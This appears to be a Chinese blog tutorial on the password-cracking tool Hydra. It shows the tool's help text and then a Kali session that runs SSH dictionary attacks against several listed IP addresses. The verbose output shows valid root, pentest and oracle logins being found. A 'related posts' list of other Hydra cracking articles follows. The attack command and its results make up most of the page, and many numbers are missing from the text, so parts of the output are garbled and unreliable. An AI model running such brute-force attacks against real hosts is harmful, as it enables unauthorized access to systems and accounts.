Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]

Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.

Example: hydra -l user -P passlist.txt ftp://192.168.0.1

# 待破解的主机列表
root@kali:~# cat serverlist 
189.37.178.1

189.37.178.216

189.37.178.98
# 破解主机的ssh用户名密码
root@kali:~# hydra -L ssh_user.dic -P ssh_pass.dic -t  -vV -o ./output.txt -e ns -M serverlist ssh
Hydra v8. (c)  by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06

[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have  seconds to abort...

[DATA] max  tasks per  servers, overall  tasks,  login tries (l:/p:), ~ tries per task

[DATA] attacking service ssh on port

[VERBOSE] Resolving addresses ... done

[INFO] Testing if password authentication is supported by ssh://189.37.178.47:22

[INFO] Successful, password authentication is supported by ssh://189.37.178.47:22

[INFO] Testing if password authentication is supported by ssh://189.37.178.216:22

[INFO] Successful, password authentication is supported by ssh://189.37.178.216:22

[INFO] Testing if password authentication is supported by ssh://189.37.178.98:22

[INFO] Successful, password authentication is supported by ssh://189.37.178.98:22

[ATTEMPT] target 189.37.178.1 - login "root" - pass "root" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "root" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "root" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[][ssh] host:189.37.178.98   login: root

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" -  of  [child ]

[][ssh] host:189.37.178.1   login: pentest   password:

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[STATUS] attack finished for189.37.178. (waiting for children to complete tests)

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[STATUS] attack finished for189.37.178. (waiting for children to complete tests)

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" -  of  [child ]

[][ssh] host:189.37.178.216   login: oracle   password: oracle

[STATUS] attack finished for189.37.178. (waiting for children to complete tests)

 of  targets successfully completed,  valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
# 查看output.txt即可查看已破解成功的列表

root@kali:~# cat output.txt

# Hydra v8. run at -- :: on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t  -vV -o ./output.txt -e ns -M serverlist ssh)

[][ssh] host: 189.37.178.98   login: root

[][ssh] host: 189.37.178.1   login: pentest   password:

[][ssh] host: 189.37.178.216   login: oracle   password: oracle

安全工具-Hydra的更多相关文章

  1. 路由器密码破解工具 Hydra 7.5

    之前只在 Browser 中保存了路由管理密码,无奈升级时管理的密码丢失了,又不想重新设置,所以尝试破解登录密码. 使用破解工具 Hydra 7.5. # hydra -l username -x : ...

  2. Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用

    Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用 hydra可以破解: http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco a ...

  3. 暴力破解工具hydra与Medusa

    ---恢复内容开始--- 暴力破解工具hydra与Medusa 内容 (一)hadry (二)Medusa (一)hydra 选项 -l LOGIN 指定破解的用户名称,对特定用户破解. -L FIL ...

  4. (总结)Linux下的暴力密码在线破解工具Hydra详解

    (总结)Linux下的暴力密码在线破解工具Hydra详解 学习了:https://blog.csdn.net/yafeichang/article/details/53502869

  5. 初试在线破解工具Hydra爆破3389服务器

    hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的. 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器.hydra还支持G ...

  6. Linux下暴力破解工具Hydra详解

    一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...

  7. [转]Linux下的暴力密码破解工具Hydra详解

    摘自:http://linzhibin824.blog.163.com/blog/static/735577102013144223127/ 这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破 ...

  8. linux下暴力破解工具hydra【转】

    一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...

  9. linux暴力密码破解工具hydra安装与使用

    说明:hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco ...

  10. Kali中密码暴力破解工具hydra的使用

    前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解.密码能否破解,在于字典是否强大.本文仅从安全角度去讲解工具的使用,请 ...

随机推荐

  1. XXL-JOB原理--定时任务框架简介(一)

    https://blog.csdn.net/qq924862077/article/details/82595948 https://blog.csdn.net/qq924862077/article ...

  2. 利用cookie实现iframe刷新时停留在当前页面

    这段时间第一次用iframe,发现问题还挺多,这次主要解决了一个用cookie实现iframe刷新时停留在当前页面,具体步骤如下: 1.必须在每一个页面中记录下当前的url并存入cookie中,具体代 ...

  3. 9. Fizz Buzz 问题

    Description Given number n. Print number from 1 to n. But: when number is divided by 3, print " ...

  4. JAVA中final修饰符小结

    一.final关键字可以用来修饰类.方法.变量.各有不同. A.修饰类(class).      1.该类不能被继承.      2.类中的方法不会被覆盖,因此默认都是final的.      3.用 ...

  5. 机器学习模型从windows下 spring上传到预发布会导致模型不可加载

    1.通过上传到redis,程序通过redis拉取模型,解决问题. 2.问题原因初步思考为windows下模型文件上传到 linux导致,待继续跟进查找.

  6. BZOJ.2726.[SDOI2012]任务安排(DP 斜率优化)

    题目链接 数据范围在这:https://lydsy.com/JudgeOnline/wttl/thread.php?tid=613, 另外是\(n\leq3\times10^5\). 用\(t_i\) ...

  7. BZOJ.4910.[SDOI2017]苹果树(树形依赖背包 DP 单调队列)

    BZOJ 洛谷 \(shadowice\)已经把他的思路说的很清楚了,可以先看一下会更好理解? 这篇主要是对\(Claris\)题解的简单说明.与\(shadowice\)的做法还是有差异的(比如并没 ...

  8. 新浪SAE创建微信模板消息应用与SVN的使用

    本地项目源文件必须放在应用名目录下面的数字目录里面.如:D:\SVN\xtmp1\1 我们在前面讲述在新浪SAE中如何建站,今天我们来详解如何上传文件.新浪SAE中是不允许用FTP来上传的.我们只能用 ...

  9. boost::lockfree::queue多线程读写实例

    最近的任务是写一个多线程的东西,就得接触多线程队列了,我反正是没学过分布式的,代码全凭感觉写出来的,不过运气好,代码能够work= = 话不多说,直接给代码吧,一个多消费者,多生产者的模式.假设我的任 ...

  10. 【网站seo优化】SEO优化每天的工作内容是什么?

    [网站seo优化]SEO优化每天的工作内容是什么?从未知的领域来到seo,感到搜索引擎无比神奇,接触seo久了,有每天必做的工作内容,大量的seo从业者,每天的工作内容大同小异,主要做的工作有通过相应 ...